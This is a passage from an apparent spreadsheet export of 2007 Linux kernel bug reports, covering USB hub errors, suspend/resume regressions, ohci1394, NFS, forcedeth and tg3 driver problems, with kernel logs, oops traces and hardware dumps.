localhost kernel: [ 443.152524] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.152776] hub 1-4:1.0: hub_port_status failed (err = -71) Feb 4 22:17:23 localhost kernel: [ 443.152972] usb-storage: device scan complete Feb 4 22:17:23 localhost kernel: [ 443.153026] hub 1-4:1.0: hub_port_status failed (err = -71) Feb 4 22:17:27 localhost kernel: [ 447.100213] usb 1-4.2: USB disconnect, address 22 Feb 4 22:17:27 localhost kernel: [ 447.100515] usb 1-4.3: USB disconnect, address 23 Feb 4 22:17:27 localhost kernel: [ 447.100682] drivers/usb/class/usblp.c: usblp0: removed Feb 4 22:17:27 localhost kernel: [ 447.210986] usb 1-4: reset high speed USB device using ehci_hcd and address 21 Feb 4 22:17:27 localhost kernel: [ 447.322895] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:27 localhost kernel: [ 447.538728] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:27 localhost kernel: [ 447.754561] usb 1-4: reset high speed USB device using ehci_hcd and address 21 Feb 4 22:17:27 localhost kernel: [ 447.866474] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:28 localhost kernel: [ 448.082310] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:28 localhost kernel: [ 448.298142] usb 1-4: reset high speed USB device using ehci_hcd and address 21 Feb 4 22:17:28 localhost kernel: [ 448.705823] usb 1-4: device not accepting address 21, error -71 Feb 4 22:17:28 localhost kernel: [ 448.817738] usb 1-4: reset high speed USB device using ehci_hcd and address 21 Feb 4 22:17:29 localhost kernel: [ 449.225424] usb 1-4: device not accepting address 21, error -71 Feb 4 22:17:29 localhost kernel: [ 449.225500] hub 1-4:1.0: activate --&gt; -19 Feb 4 22:17:29 localhost kernel: [ 449.329347] usb 1-4: USB disconnect, address 21 Feb 4 22:17:29 localhost kernel: [ 449.441259] usb 1-4: new high speed USB device using ehci_hcd and address 24 Feb 4 22:17:29 localhost kernel: [ 449.553168] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:29 localhost kernel: [ 449.769054] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:30 localhost kernel: [ 449.984838] usb 1-4: new high speed USB device using ehci_hcd and address 25 Feb 4 22:17:30 localhost kernel: [ 450.096748] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:30 localhost kernel: [ 450.312580] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:30 localhost kernel: [ 450.528414] usb 1-4: new high speed USB device using ehci_hcd and address 26 Feb 4 22:17:31 localhost kernel: [ 450.936099] usb 1-4: device not accepting address 26, error -71 Feb 4 22:17:31 localhost kernel: [ 451.048017] usb 1-4: new high speed USB device using ehci_hcd and address 27 Feb 4 22:17:31 localhost kernel: [ 451.455697] usb 1-4: device not accepting address 27, error -71 Feb 4 22:17:46 localhost kernel: [ 466.128348] usb 1-4: new high speed USB device using ehci_hcd and address 28 Feb 4 22:17:46 localhost kernel: [ 466.260680] usb 1-4: configuration #1 chosen from 1 choice Feb 4 22:17:46 localhost kernel: [ 466.260873] hub 1-4:1.0: USB hub found Feb 4 22:17:46 localhost kernel: [ 466.260973] hub 1-4:1.0: 4 ports detected Feb 4 22:17:46 localhost kernel: [ 466.580119] usb 1-4.2: new low speed USB device using ehci_hcd and address 29 Feb 4 22:17:46 localhost kernel: [ 466.695994] usb 1-4.2: configuration #1 chosen from 1 choice Feb 4 22:17:46 localhost kernel: [ 466.705280] input: HID 1241:1166 as /class/input/input9 Feb 4 22:17:46 localhost kernel: [ 466.705393] input: USB HID v1.00 Mouse [HID 1241:1166] on usb-0000:00:02.2-4.2 Feb 4 22:17:47 localhost kernel: [ 466.919872] usb 1-4.3: new high speed USB device using ehci_hcd and address 30 Feb 4 22:17:47 localhost kernel: [ 467.029998] usb 1-4.3: configuration #1 chosen from 1 choice Feb 4 22:17:47 localhost kernel: [ 467.031569] drivers/usb/class/usblp.c: usblp0: USB Bidirectional printer dev 30 if 1 alt 0 proto 2 vid 0x04A9 pid 0x1718 Feb 4 22:17:47 localhost kernel: [ 467.031794] scsi1 : SCSI emulation for USB Mass Storage devices Feb 4 22:17:47 localhost kernel: [ 467.031958] usb-storage: device found at 30 Feb 4 22:17:47 localhost kernel: [ 467.031960] usb-storage: waiting for device to settle before scanning Feb 4 22:17:49 localhost kernel: [ 469.407676] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.407921] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.408171] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.408420] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.408670] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.408730] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:49 localhost kernel: [ 469.408921] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.409168] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.409419] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.409669] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.409920] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.410168] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.410228] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:49 localhost kernel: [ 469.410419] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.410670] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.410918] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.411168] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.411419] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.411666] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.411726] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:49 localhost kernel: [ 469.411918] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.412167] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.412418] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.412666] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.412917] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.413167] hub 1-4:1.0: cannot reset port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.413226] hub 1-4:1.0: Cannot enable port 2. Maybe the USB cable is bad? Feb 4 22:17:49 localhost kernel: [ 469.413416] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.413666] hub 1-4:1.0: cannot disable port 2 (err = -71) Feb 4 22:17:49 localhost kernel: [ 469.413917] hub 1-4:1.0: hub_port_status failed (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.028128] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.028378] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.028626] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.028876] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.029126] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.029186] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:52 localhost kernel: [ 472.029376] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.029625] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.029876] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.030126] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.030374] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.030625] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.030684] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:52 localhost kernel: [ 472.030876] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.031124] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.031374] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.031624] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.031874] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.032123] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.032182] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:52 localhost kernel: [ 472.032375] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.032624] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.032872] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.033122] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.033373] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.033621] hub 1-4:1.0: cannot reset port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.033680] hub 1-4:1.0: Cannot enable port 3. Maybe the USB cable is bad? Feb 4 22:17:52 localhost kernel: [ 472.033873] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.034122] hub 1-4:1.0: cannot disable port 3 (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.034375] hub 1-4:1.0: hub_port_status failed (err = -71) Feb 4 22:17:52 localhost kernel: [ 472.034570] usb-storage: device scan complete Feb 4 22:17:52 localhost kernel: [ 472.034623] hub 1-4:1.0: hub_port_status failed (err = -71) Feb 4 22:17:56 localhost kernel: [ 476.002669] usb 1-4.2: USB disconnect, address 29 Feb 4 22:17:56 localhost kernel: [ 476.002991] usb 1-4.3: USB disconnect, address 30 Feb 4 22:17:56 localhost kernel: [ 476.003199] drivers/usb/class/usblp.c: usblp0: removed Feb 4 22:17:56 localhost kernel: [ 476.112698] usb 1-4: reset high speed USB device using ehci_hcd and address 28 Feb 4 22:17:56 localhost kernel: [ 476.224569] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:56 localhost kernel: [ 476.440400] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:56 localhost kernel: [ 476.656234] usb 1-4: reset high speed USB device using ehci_hcd and address 28 Feb 4 22:17:56 localhost kernel: [ 476.768148] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:57 localhost kernel: [ 476.983986] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:57 localhost kernel: [ 477.199820] usb 1-4: reset high speed USB device using ehci_hcd and address 28 Feb 4 22:17:57 localhost kernel: [ 477.607497] usb 1-4: device not accepting address 28, error -71 Feb 4 22:17:57 localhost kernel: [ 477.719412] usb 1-4: reset high speed USB device using ehci_hcd and address 28 Feb 4 22:17:58 localhost kernel: [ 478.127096] usb 1-4: device not accepting address 28, error -71 Feb 4 22:17:58 localhost kernel: [ 478.127170] hub 1-4:1.0: activate --&gt; -19 Feb 4 22:17:58 localhost kernel: [ 478.231021] usb 1-4: USB disconnect, address 28 Feb 4 22:17:58 localhost kernel: [ 478.342932] usb 1-4: new high speed USB device using ehci_hcd and address 31 Feb 4 22:17:58 localhost kernel: [ 478.454845] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:58 localhost kernel: [ 478.670676] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:59 localhost kernel: [ 478.886509] usb 1-4: new high speed USB device using ehci_hcd and address 32 Feb 4 22:17:59 localhost kernel: [ 478.998429] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:59 localhost kernel: [ 479.214256] usb 1-4: device descriptor read/64, error -71 Feb 4 22:17:59 localhost kernel: [ 479.430089] usb 1-4: new high speed USB device using ehci_hcd and address 33 Feb 4 22:17:59 localhost kernel: [ 479.837772] usb 1-4: device not accepting address 33, error -71 Feb 4 22:18:00 localhost kernel: [ 479.949688] usb 1-4: new high speed USB device using ehci_hcd and address 34 Feb 4 22:18:00 localhost kernel: [ 480.357370] usb 1-4: device not accepting address 34, error -71</t>
  </si>
  <si>
    <t>README.drm has stale URLs</t>
  </si>
  <si>
    <t>2007-02-04 17:02 UTC</t>
  </si>
  <si>
    <t>Marc Bejarano</t>
  </si>
  <si>
    <t>2007-05-08 21:48 UTC</t>
  </si>
  <si>
    <t>/drivers/char/drm/README.drm links to 4 http://precisioninsight.com URLs that are now 404.</t>
  </si>
  <si>
    <t>Some "patch" between 2.6.20-rc7 and 2.6.20-final-vanilla has broken my SWSUSP resume</t>
  </si>
  <si>
    <t>2007-02-05 01:38 UTC</t>
  </si>
  <si>
    <t>2007-05-06 15:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-rc7 Distribution: Debian Testing Hardware Environment: Acer TravelMate 242 Software Environment: Problem Description: Some "patch" between 2.6.20-rc7 and 2.6.20-final-vanilla has broken my SWSUSP resume. In 2.6.20-rc7 kernel after image load from disk normally wake up into my Xorg and everythink is fine, but in 2.6.20-final after disk image load starts Capslock blinks - kernel freezes :( Steps to reproduce: Boot both kernels on the laptop</t>
  </si>
  <si>
    <t>The atkbd module makes system unusable</t>
  </si>
  <si>
    <t>2.6.11 and above</t>
  </si>
  <si>
    <t>2007-02-05 07:48 UTC</t>
  </si>
  <si>
    <t>Luis Uribe</t>
  </si>
  <si>
    <t>2008-05-21 12:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.8-3 Distribution: Debian Hardware Environment: Dell Latitude c610 Software Environment: Debian Etch Problem Description: When i use the i8k module for Dell Latitude laptops with this kernel and 2.6.17 and move the mouse or press a key i'm getting a lot of errors like this Jul 30 16:01:13 localhost kernel: atkbd.c: Use 'setkeycodes 00 &lt;keycode&gt;' to make it known. Jul 30 16:01:13 localhost kernel: atkbd.c: Unknown key pressed (translated set 2, code 0x0 on isa0060/serio0). Jul 30 16:01:13 localhost kernel: atkbd.c: Use 'setkeycodes 00 &lt;keycode&gt;' to make it known. Jul 30 16:01:13 localhost kernel: atkbd.c: Unknown key pressed (translated set 2, code 0x0 on isa0060/serio0). Jul 30 16:01:13 localhost kernel: atkbd.c: Use 'setkeycodes 00 &lt;keycode&gt;' to make it known. Steps to reproduce: #modprobe i8k (in a kernel version 2.6.11 or above)</t>
  </si>
  <si>
    <t>ohci1394 module broken and cannot be removed</t>
  </si>
  <si>
    <t>2007-02-05 14:58 UTC</t>
  </si>
  <si>
    <t>Robert Crocombe</t>
  </si>
  <si>
    <t>2007-02-09 15:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19 Distribution: Fedora Core 5 Hardware Environment: 4-processor IWill H8502 (2.8GHz single core Opterons) w/ 10GB of RAM installed 4/2/2/2 across 4 nodes. Software Environment: This is from the working kernel. All have been built with the same versions of software: Linux bubba.tuc.us.ray.com 2.6.19_00 #2 SMP PREEMPT Mon Feb 5 15:20:05 MST 2007 x86_64 x86_64 x86_64 GNU/Linux Gnu C 4.1.1 Gnu make 3.80 binutils 2.16.91.0.6 util-linux 2.13-pre6 mount 2.13-pre6 module-init-tools 3.2-pre9 e2fsprogs 1.38 quota-tools 3.13. PPP 2.4.3 Linux C Library &gt; libc.2.4 Dynamic linker (ldd) 2.4 Procps 3.2.6 Net-tools 1.60 Kbd 1.12 Sh-utils 5.93 udev 084 Modules Loaded raw1394 ohci1394 ieee1394 tg3 Problem Description: Looks like something broke between 2.6.19 and 2.6.20-rc1. Immediately after boot, I tried to run a program that uses the bus via libraw1394, but no ports are detected. ohci1394 indicates via lsmod that it has 1 user immediately after boot before raw1394 was loaded (normally its 0). Additionally, the module cannot be unloaded, even with --force. [root@bubba rcrocomb]# uptime 16:03:14 up 2 min, 1 user, load average: 2.03, 0.86, 0.32 [root@bubba rcrocomb]# lsmod Module Size Used by ohci1394 41947 1 ieee1394 103984 1 ohci1394 tg3 106884 0 [root@bubba rcrocomb]# rmmod ohci1394 ERROR: Module ohci1394 is in use I have confirmed this with: 2.6.20-rt2 2.6.20 2.6.20-rc5 2.6.20-rc5-rt10 2.6.20-rc1 2.6.19 is okay. Kernel configs are as identical as possible. When booting 2.6.20-rt2 (only), an Oops is displayed: behavior is identical to other kernels. Feb 5 14:49:01 bubba kernel: ieee1394: nodemgr and IRM functionality disabled Feb 5 14:49:01 bubba kernel: ACPI: PCI Interrupt 0000:02:04.0[A] -&gt; GSI 72 (level, low) -&gt; IRQ 72 Feb 5 14:49:01 bubba kernel: stopped custom tracer. Feb 5 14:49:01 bubba kernel: Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: Feb 5 14:49:01 bubba kernel: [&lt;ffffffff803f3c2b&gt;] klist_add_tail+0x39/0x49 Feb 5 14:49:01 bubba kernel: PGD 279aee067 PUD 180383067 PMD 0 Feb 5 14:49:01 bubba kernel: Oops: 0002 [1] PREEMPT SMP Feb 5 14:49:01 bubba kernel: CPU 0 Feb 5 14:49:01 bubba kernel: Modules linked in: ohci1394 ieee1394 tg3 Feb 5 14:49:01 bubba kernel: Pid: 1344, comm: modprobe Not tainted 2.6.20-rt2_00 #2 Feb 5 14:49:01 bubba kernel: RIP: 0010:[&lt;ffffffff803f3c2b&gt;] [&lt;ffffffff803f3c2b&gt;] klist_add_tail+0x39/0x49 Feb 5 14:49:01 bubba kernel: RSP: 0018:ffff810279b3bce8 EFLAGS: 00010246 Feb 5 14:49:01 bubba kernel: RAX: ffffffff880342d0 RBX: ffffffff88034298 RCX: 0000000000000000 Feb 5 14:49:01 bubba kernel: RDX: ffff810002bf41f8 RSI: ffffffff80487511 RDI: ffffffff88034298 Feb 5 14:49:01 bubba kernel: RBP: ffff810002bf43b8 R08: ffff810037c4cf40 R09: ffffffff880337a0 Feb 5 14:49:01 bubba kernel: R10: 000000000000003b R11: ffffffff80536a40 R12: ffff810002bf41f0 Feb 5 14:49:01 bubba kernel: R13: 0000000000000000 R14: 0000000000000000 R15: 000000000000000f Feb 5 14:49:01 bubba kernel: FS: 00002b71f7fd81f0(0000) GS:ffffffff80515100(0000) knlGS:0000000000000000 Feb 5 14:49:01 bubba kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Feb 5 14:49:01 bubba kernel: CR2: 0000000000000000 CR3: 0000000279b8e000 CR4: 00000000000006e0 Feb 5 14:49:01 bubba kernel: Process modprobe (pid: 1344, threadinfo ffff810279b3a000, task ffff8102797a7080) Feb 5 14:49:01 bubba kernel: Stack: ffff810037c4cf40 ffff810002bf4128 0000000000000000 ffffffff8034af87 Feb 5 14:49:01 bubba kernel: ffff810002bf4128 ffffffff8034afba ffff810002bf4430 ffff810002bf4128 Feb 5 14:49:01 bubba kernel: ffffffff880337a0 ffffffff8034a15d 0000000000000000 0000000000000000 Feb 5 14:49:01 bubba kernel: Call Trace: Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8034af87&gt;] device_bind_driver+0x9/0x12 Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8034afba&gt;] device_attach+0x2a/0x5d Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8034a15d&gt;] bus_attach_device+0x23/0x49 Feb 5 14:49:01 bubba kernel: [&lt;ffffffff803492b7&gt;] device_add+0x359/0x509 Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8801e318&gt;] :ieee1394:hpsb_alloc_host+0x20d/0x24e Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8803b010&gt;] :ohci1394:ohci1394_pci_probe+0x45/0x625 Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8030a92e&gt;] pci_device_probe+0xcd/0x134 Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8034add8&gt;] really_probe+0x87/0x10c Feb 5 14:49:01 bubba kernel: [&lt;ffffffff8034af52&gt;] __driver_attach+0x46/0x6d Feb 5 14:49:02 bubba kernel: [&lt;ffffffff8034af0c&gt;] __driver_attach+0x0/0x6d Feb 5 14:49:02 bubba kernel: [&lt;ffffffff8034a414&gt;] bus_for_each_dev+0x43/0x6e Feb 5 14:49:02 bubba kernel: [&lt;ffffffff8034a70b&gt;] bus_add_driver+0x6e/0x190 Feb 5 14:49:02 bubba kernel: [&lt;ffffffff8030ab32&gt;] __pci_register_driver+0x85/0xba Feb 5 14:49:02 bubba kernel: [&lt;ffffffff80292f74&gt;] sys_init_module+0xab/0x169 Feb 5 14:49:02 bubba kernel: [&lt;ffffffff8025639e&gt;] system_call+0x7e/0x83 Feb 5 14:49:02 bubba kernel: Feb 5 14:49:02 bubba kernel: Feb 5 14:49:02 bubba kernel: Code: 48 89 11 48 89 4a 08 59 5b 41 5c e9 ee 75 e6 ff 41 54 49 89 Feb 5 14:49:02 bubba kernel: RIP [&lt;ffffffff803f3c2b&gt;] klist_add_tail+0x39/0x49 Feb 5 14:49:02 bubba kernel: RSP &lt;ffff810279b3bce8&gt; Feb 5 14:49:02 bubba kernel: CR2: 0000000000000000 Steps to reproduce: Boot any of aforementioned kernels.</t>
  </si>
  <si>
    <t>NFS writes hang, cause excess non-file network traffic</t>
  </si>
  <si>
    <t>2.6.18, 2.6.19, 2.6.20</t>
  </si>
  <si>
    <t>Vanessa Ezekowitz</t>
  </si>
  <si>
    <t>2012-05-14 16:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: I was able to confirm that NFS works just fine in 2.6.16.39, everything newer seems to be broken in some way or another for me. Others report that 2.6.18.2 also works, but not in my case. Distribution: [K]ubuntu Edgy Hardware Environment: AMD 64x2/3800+, ULI-based mainboard, 1GB RAM, onboard RTL8139 NIC. Software Environment: EH, standard-issue Kubuntu, with vanilla kernel from kernel.org Problem Description: Assume you have two machines A and B, where A is normally a server offering a directory over NFS, and B is normally a client machine mounting that shared directory. If A copies a file *from* B (i.e. going the other way), everything works fine also. If B copies a file *from* A, again it works just fine. Files transfer at full speed in all three of these cases (close to 10.5 MB/sec according to midnight commander). I call these two types of requests "pull" requests, because the machine receiving the file is the one to initiate the copy. The other two cases, which are the most common ways to save a file to an NFS share, involves B copying a file *to* A or A copying a file *to* B. That is to say, when the machine *sending* the file is the one to initiate the copy (a "push" request, I call it). When you do this, B does weird things. 2.6.20 (any revision) pegs the CPU load (both cores!) while network traffic drops to only a few hundred KB/sec. On kernels 2.6.18 and 2.6.19 (seems like any revision), machine B will hard-lock off and on and/or spike the CPU load. When it hard-locks, network traffic generally spikes, yet the receiving end doesn't receive any data that it can add to the file. I've confirmed the network traffic spikes by watching the netload on machine A while machine B is hung, and watching the destination file growing (or rather, not growing) during this time. Similarly, when machine B is just in a 100%-CPU- load state, file data isn't being received. tcpdump indicates a lot of error traffic, but I don't know how to decipher most of it. More information on this bug can be found here: https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.17/+bug/71212 Steps to reproduce: It should be enough to set up two computers with the same distro (i.e. ubuntu), doesn't matter which version (edgy, dapper, breezy), build a recent kernel from kernel.org sources, and try doing the above copy operations.</t>
  </si>
  <si>
    <t>Network traffic stops inexplicably when running at gigabit speed.</t>
  </si>
  <si>
    <t>2007-02-06 08:57 UTC</t>
  </si>
  <si>
    <t>Fredrik Ohrn</t>
  </si>
  <si>
    <t>2007-03-26 15:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.6 Distribution: CentOS 4.4 Hardware Environment: ASUS M2N-E (nForce 570 chipset) AMD64 X2 Dual Core 5200+ Built in nic hooked up to a HP ProCurve 2428 gigabit switch. Software Environment: Using a plain kernel without any distro patches. Using forcedeth network driver. No nVidia binary drivers what so ever. IP tables is turned off. Problem Description: At random all network traffic just stops without apparent reason. Running tcpdump shows outgoing packets but no incoming packets. Ifconfig does not show any rx or tx errors. No error messages show up in dmesg. Transfering data at high speed triggers the problem almost right away. When running an interactive session in ssh it tends to happen after 5-10 minutes. Kernel 2.6.19.2 has the same problem as well. Doing a ifdown eth0 + ifup eth0 makes things work again for a while, but sooner or later it happens again. When hooking it up to a 100 megabit switch it works perfectly. I've tried messing around with all parameters you can set with ethtool but nothing helped.</t>
  </si>
  <si>
    <t>tg3 driver has issues with suspend/resume</t>
  </si>
  <si>
    <t>2007-02-07 09:28 UTC</t>
  </si>
  <si>
    <t>Jeremie Bouttier</t>
  </si>
  <si>
    <t>2007-06-18 10:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Etch/Sid Hardware Environment: Dell Latitude D420 Problem Description: I have issues with suspend-to-ram on my machine : using the s2ram binary (0.5) I can suspend and resume once, but on the second try the system fails to resume (black screen with "Linu" written in yellow letters on the top line ; does not answer to network). It seems to be due to the tg3 driver, and happens only when the corresponding interface is up. Steps to reproduce: 1) boot in single-user mode (tg3/eth0 is activated, gets address with DHCP) 2) run "s2ram -f", wait 10s, press power button =&gt; the system resumes 3) repeat step 2 =&gt; the system hangs as indicated above However if between 1 and 2, I run "ifconfig eth0 down", then the system resumes fine and I can repeat indefinitely step 2. Alternatively, I can unload the tg3 module before suspending (if I instruct the powersave suspend script to do so, then suspend-to-ram works also in multi-user+X mode). This behaviour has been first observed on a 2.6.18 kernel from Debian, and reproduced on a 2.6.20 mainline kernel. Below I include the output of "lspci -vvv -xxx -s 09:00.0" (corresponding to the Ethernet card) and of "dmesg" (with 2.6.20 kernel). Thanks, Jeremie a) output of "lspci -vvv -xxx -s 09:00.0" 09:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5752 Gigabit Ethernet PCI Express (rev 02) Subsystem: Dell Unknown device 01d6 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 74 Region 0: Memory at dfcf0000 (64-bit, non-prefetchable) [size=64K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable+ DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data Capabilities: [58] Message Signalled Interrupts: Mask- 64bit+ Queue=0/3 Enable+ Address: 00000000fee00000 Data: 404a Capabilities: [d0] Express Endpoint IRQ 0 Device: Supported: MaxPayload 512 bytes, PhantFunc 0, ExtTag+ Device: Latency L0s &lt;4us, L1 unlimited Device: AtnBtn- AtnInd- PwrInd- Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 4096 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s L1, Port 0 Link: Latency L0s &lt;2us, L1 &lt;64us Link: ASPM L1 Enabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x1 Capabilities: [100] Advanced Error Reporting Capabilities: [13c] Virtual Channel 00: e4 14 00 16 06 01 10 00 02 00 00 02 10 00 00 00 10: 04 00 cf df 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 07 00 00 00 28 10 d6 01 30: 00 00 00 00 48 00 00 00 00 00 00 00 03 01 00 00 40: 00 00 00 00 00 00 00 00 01 50 02 c0 00 21 00 64 50: 03 58 b8 00 4d 89 e7 bd 05 d0 87 00 00 00 e0 fe 60: 00 00 00 00 4a 40 00 00 98 02 02 60 00 00 18 76 70: f2 10 00 00 40 00 00 00 34 6c 00 00 00 00 00 00 80: b0 0c 00 00 00 00 00 00 34 00 13 04 82 10 08 24 90: 29 ba 00 01 00 00 00 7b 00 00 00 00 fe 00 00 00 a0: 00 00 00 00 36 00 00 00 00 00 00 00 b2 00 00 00 b0: 00 00 00 00 00 00 00 5c 00 00 00 00 00 00 00 00 c0: 00 00 00 00 10 40 00 00 0e 00 00 00 00 00 00 00 d0: 10 00 01 00 a2 0f 04 05 00 50 10 00 11 5c 03 00 e0: 42 00 11 10 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b) output of "dmesg" Linux version 2.6.20 (root@jimmy) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Wed Feb 7 17:19:39 CET 2007 BIOS-provided physical RAM map: sanitize start sanitize end copy_e820_map() start: 0000000000000000 size: 